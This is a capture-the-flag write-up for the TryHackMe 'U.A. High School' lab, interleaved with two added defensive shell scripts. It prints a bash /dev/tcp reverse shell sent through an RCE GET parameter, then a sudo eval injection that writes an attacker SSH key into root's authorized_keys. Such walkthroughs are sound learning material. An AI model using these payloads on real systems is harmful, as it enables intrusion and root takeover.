TryHackMe: U.A. High School
U.A. High School is an easy TryHackMe box. We start by finding a GET parameter that allows us to execute code; once on the box, we find a corrupted image that contains user credentials, and then exploit a vulnerable sudo script to get root access.
Enumeration
Nmap Scan
As always, we start with an nmap scan on 10.10.17.127.
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ nmap -sC -sV 10.10.17.127 -oN uahighschool.out
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-24 13:05 BST
Nmap scan report for 10.10.17.127
Host is up (0.088s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 58:2f:ec:23:ba:a9:fe:81:8a:8e:2d:d8:91:21:d2:76 (RSA)
| 256 9d:f2:63:fd:7c:f3:24:62:47:8a:fb:08:b2:29:e2:b4 (ECDSA)
|_ 256 62:d8:f8:c9:60:0f:70:1f:6e:11:ab:a0:33:79:b5:5d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: U.A. High School
3517/tcp filtered 802-11-iapp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds
Looking at the results, we have two open ports:
- 22/SSH OpenSSH - open
- 80/HTTP Apache - open
Web Server
Taking a look at the web server, it seems to be a school web app with a bunch of .html pages. Looking around didn't get us anywhere, as all the pages were .html, even the contact form at /contact.html (the form sends its POST request to #, so the data goes nowhere). From here, we decided to run GoBuster to enumerate subdirectories and potential files.
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ gobuster dir -u http://10.10.17.127/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -t 30
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.17.127/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.htm (Status: 403) [Size: 277]
/assets (Status: 301) [Size: 313] [--> http://10.10.17.127/assets/]
/.php (Status: 403) [Size: 277]
/. (Status: 200) [Size: 1988]
[....]
After letting it run for a while we only get /assets. Taking a look at http://10.10.17.127/assets/ we get a blank page, so the first intuition was to check whether the index is a PHP or an HTML page: taking a look at /index.html we get a 404 Not Found, so we can confirm that the index is a PHP file.
Running GoBuster one more time on /assets/ didn't help much, as we did not find anything. At this point it seemed like a dead end, and the only thing left was to figure out why there is an index.php under /assets/. After looking around for quite some time, we decided to fuzz GET parameters with ffuf.
At first we didn't get a hit from ffuf, but we kept enumerating and BINGO! we found Remote Code Execution through a single GET parameter.
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -u http://10.10.17.127/assets/index.php?FUZZ=ls -mc all -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.17.127/assets/index.php?FUZZ=ls
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/api/objects.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 0
________________________________________________
cmd [Status: 200, Size: 40, Words: 1, Lines: 1, Duration: 91ms]
:: Progress: [3132/3132] :: Job [1/1] :: 91 req/sec :: Duration: [0:00:16] :: Errors: 0 ::
Exploitation
Reverse Shell
Curling that GET parameter, we can confirm that we have RCE and that the output is displayed as base64-encoded text.
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ curl http://10.10.17.127/assets/index.php?cmd=ls -s
aW1hZ2VzCmluZGV4LnBocApzdHlsZXMuY3NzCg==
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ curl http://10.10.17.127/assets/index.php?cmd=ls -s | base64 -d
images
index.php
styles.css
Starting Burp Suite and catching a request, we were able to get a reverse shell.
GET /assets/index.php?cmd=bash+-c+"bash+-i+>%26+/dev/tcp/10.9.2.91/9001+0>%261" HTTP/1.1
Host: 10.10.17.127
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: PHPSESSID=29sjpa44o75057firg2tdfdqmi
Upgrade-Insecure-Requests: 1
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.9.2.91] from (UNKNOWN) [10.10.17.127] 41064
bash: cannot set terminal process group (794): Inappropriate ioctl for device
bash: no job control in this shell
www-data@myheroacademia:/var/www/html/assets$
User Pivoting
Looking for users on the machine, we only find root and another user called deku.
www-data@myheroacademia:/var/www/html/assets$ cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
deku:x:1000:1000:deku:/home/deku:/bin/bash
Looking for any vector to pivot to deku, we found a Hidden_Content directory in /var/www. Taking a look at its content, we find a text file with base64-encoded text; decoding it gives us a passphrase that we save for later.
www-data@myheroacademia:/var/www/Hidden_Content$ ls
passphrase.txt
www-data@myheroacademia:/var/www/Hidden_Content$ cat passphrase.txt
QWxsbWlna[REDACTED]
www-data@myheroacademia:/var/www/Hidden_Content$ echo QWxsbWlna[REDACTED]
QWxsbWlna[REDACTED]
www-data@myheroacademia:/var/www/Hidden_Content$ echo QWxsbWlna[REDACTED] | base64 -d
[REDACTED]
www-data@myheroacademia:/var/www/Hidden_Content$
Looking at the hint provided in the room, we know that we need to look for an unused file:
Once you found a way in, be suspicious of any unused files.
Looking at the images folder, we can see an unused image available on the web server.
www-data@myheroacademia:/var/www/html$ ls
about.html admissions.html assets contact.html courses.html index.html
www-data@myheroacademia:/var/www/html$ cd assets/
www-data@myheroacademia:/var/www/html/assets$ cd images/
www-data@myheroacademia:/var/www/html/assets/images$ ls
oneforall.jpg yuei.jpg
www-data@myheroacademia:/var/www/html/assets/images$
Copying it to our host, we knew this was a steganography challenge since we got a passphrase earlier. Running file on oneforall.jpg only reports data, while exiftool tells us that it's a PNG file.
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ file oneforall.jpg
oneforall.jpg: data
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ exiftool oneforall.jpg.1
ExifTool Version Number : 12.76
File Name : oneforall.jpg.1
Directory : .
File Size : 98 kB
File Modification Date/Time : 2023:07:09 17:42:05+01:00
File Access Date/Time : 2024:08:24 14:37:22+01:00
File Inode Change Date/Time : 2024:08:24 14:37:22+01:00
File Permissions : -rw-rw-r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Warning : PNG image did not start with IHDR
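The exiftool warning above is the kind of extension/content mismatch that a signature check catches. The following is an added example, not part of the original writeup: a small POSIX sh script that classifies image files by their leading bytes and reports every file under a web root whose extension disagrees with its content. The function names and the sample files are my own.

```shell
#!/bin/sh
# Added example: classify files by magic bytes, independent of their extension.
# Signatures (hex): PNG 89504e470d0a1a0a, JPEG ffd8ff.., GIF 474946383[79]61.

# Print the first $2 bytes of file $1 as a lowercase hex string.
head_hex() {
    od -A n -t x1 -N "$2" "$1" | tr -d ' \n'
}

# Print png, jpeg, gif or unknown based on the leading bytes only.
magic_type() {
    case "$(head_hex "$1" 8)" in
        89504e470d0a1a0a)           echo png ;;
        ffd8ff*)                    echo jpeg ;;
        474946383761*|474946383961*) echo gif ;;
        *)                          echo unknown ;;
    esac
}

# Return 0 when the extension and the content agree, 1 when they do not
# (a .jpg that holds PNG bytes is exactly the "corrupted image" case above).
extension_matches() {
    ext=$(printf '%s' "${1##*.}" | tr 'A-Z' 'a-z')
    case "$ext:$(magic_type "$1")" in
        jpg:jpeg|jpeg:jpeg|png:png|gif:gif) return 0 ;;
        *) return 1 ;;
    esac
}

# List every image under directory $1 whose content disagrees with its name.
report_mismatches() {
    find "$1" -type f \( -name '*.jpg' -o -name '*.jpeg' -o -name '*.png' -o -name '*.gif' \) |
    while IFS= read -r f; do
        extension_matches "$f" ||
            printf '%s: extension says %s, content is %s\n' "$f" "${f##*.}" "$(magic_type "$f")"
    done
}
```

Run `report_mismatches /var/www/html` against a web root to spot files like the one in this room before anyone else does.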
Looking at the file signature with hexeditor as well, we can see that it has a PNG signature. So now we need to change the file signature, as steghide doesn't support PNGs. Searching Google, we find a list of file signatures on Wikipedia; trying different JPG/JPEG signatures, we got one that steghide supports.
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ hexeditor oneforall.jpg
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ steghide extract -sf oneforall.jpg
Enter passphrase:
wrote extracted data to "creds.txt".
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ ls
creds.txt oneforall.jpg uahighschool.out
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ cat creds.txt
Hi Deku, this is the only way I've found to give you your account credentials, as soon as you have them, delete this file:
deku:[REDACTED]
Logging into the deku account through SSH, we were able to retrieve the user.txt file.
deku@myheroacademia:~$ ls
user.txt
deku@myheroacademia:~$ cat user.txt
THM{REDACTED}
deku@myheroacademia:~$
Privilege Escalation
Looking for sudo permissions, we found one.
deku@myheroacademia:~$ sudo -l
[sudo] password for deku:
Matching Defaults entries for deku on myheroacademia:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User deku may run the following commands on myheroacademia:
(ALL) /opt/NewComponent/feedback.sh
Taking a look at the bash script, we see a potential command injection: the input is passed to eval after only a denylist check.
#!/bin/bash
echo "Hello, Welcome to the Report Form "
echo "This is a way to report various problems"
echo " Developed by "
echo " The Technical Department of U.A."
echo "Enter your feedback:"
read feedback
if [[ "$feedback" != *"\`"* && "$feedback" != *")"* && "$feedback" != *"\$("* && "$feedback" != *"|"* && "$feedback" != *"&"* && "$feedback" != *";"* && "$feedback" != *"?"* && "$feedback" != *"!"* && "$feedback" != *"\\"* ]]; then
echo "It is This:"
eval "echo $feedback"
echo "$feedback" >> /var/log/feedback.txt
echo "Feedback successfully saved."
else
echo "Invalid input. Please provide a valid input."
fi
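The check in that script is a denylist, and it leaves the redirection characters off the list. As an added example, not the room's script, here is the same form rewritten in POSIX sh without eval and with an allowlist; the page's denylist is reproduced as a function beside it so the gap is visible. The function names and the optional log-path parameter are my own.

```shell
#!/bin/sh
# Added example: the feedback form with eval removed and an allowlist instead of a denylist.

# The room's denylist, as a function: returns 0 when the input is allowed through.
# '>' and '<' are not on the list, so "test > /tmp/test" still reaches eval and
# the redirection runs with the script's privileges.
denylist_allows() {
    case "$1" in
        *'`'*|*')'*|*'$('*|*'|'*|*'&'*|*';'*|*'?'*|*'!'*|*'\'*) return 1 ;;
        *) return 0 ;;
    esac
}

# Allowlist: non-empty, bounded length, and only letters, digits, space and
# basic punctuation. Anything else (including newlines) is rejected outright.
allowlist_allows() {
    [ -n "$1" ] && [ ${#1} -le 200 ] || return 1
    # Map spaces to '_' so the bracket expression needs no escaped space.
    case "$(printf '%s' "$1" | tr ' ' '_')" in
        *[!A-Za-z0-9_.,:-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Safe form: the input is only ever treated as data, never as shell code.
# $2 is the log path (defaults to the room's /var/log/feedback.txt).
save_feedback() {
    feedback=$1
    logfile=${2:-/var/log/feedback.txt}
    if ! allowlist_allows "$feedback"; then
        echo "Invalid input. Please provide a valid input." >&2
        return 1
    fi
    printf 'It is This:\n%s\n' "$feedback"   # printf instead of eval "echo ..."
    printf '%s\n' "$feedback" >> "$logfile"
    echo "Feedback successfully saved."
}

# Interactive use, mirroring the original prompt: sh feedback.sh --interactive
main() {
    echo "Enter your feedback:"
    IFS= read -r feedback
    save_feedback "$feedback"
}
case "${1:-}" in --interactive) main ;; esac
```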
After trying many command injection payloads from HackTricks, we didn't succeed in getting a shell or reading root files. Trying a simple payload that writes to a file, we got it working!
deku@myheroacademia:~$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
test > /tmp/test
It is This:
Feedback successfully saved.
deku@myheroacademia:~$ ls /tmp
snap-private-tmp
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-apache2.service-7Gq6Bg
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-ModemManager.service-f0J9Zf
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-systemd-logind.service-ggDZJi
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-systemd-resolved.service-8bvSTi
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-systemd-timesyncd.service-kG3c1f
test
deku@myheroacademia:~$ cat /tmp/test
test
deku@myheroacademia:~$ ls -la /tmp/test
-rw-r--r-- 1 root root 5 Aug 24 14:05 /tmp/test
So using test > /tmp/test, we get the file created by root with test as its content. With that in mind, we came up with the idea of writing our SSH public key to root's .ssh/authorized_keys file, and it worked!
deku@myheroacademia:~$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
ssh-rsa [REDACTED] Str4ngerX@Voldemort > /root/.ssh/authorized_keys
It is This:
Feedback successfully saved.
deku@myheroacademia:~$
root@myheroacademia:~# ls
root.txt snap
root@myheroacademia:~# cat root.txt
root@myheroacademia:/opt/NewComponent# cat /root/root.txt
__ __ _ _ _ _____ _
\ \ / /__ _ _ / \ _ __ ___ | \ | | _____ __ |_ _| |__ ___
\ V / _ \| | | | / _ \ | '__/ _ \ | \| |/ _ \ \ /\ / / | | | '_ \ / _ \
| | (_) | |_| | / ___ \| | | __/ | |\ | (_) \ V V / | | | | | | __/
|_|\___/ \__,_| /_/ \_\_| \___| |_| \_|\___/ \_/\_/ |_| |_| |_|\___|
_ _
_ _ ___ | | | |
| \ | | ___ / | | |__| | ___ _ __ ___
| \| |/ _ \/_/| | | __ |/ _ \ '__|/ _ \
| |\ | (_) __| |_ | | | | __/ | | (_) |
|_| \_|\___/|______| |_| |_|\___|_| \___/
THM{REDACTED}
root@myheroacademia:~#
And that's it! We rooted the box with success!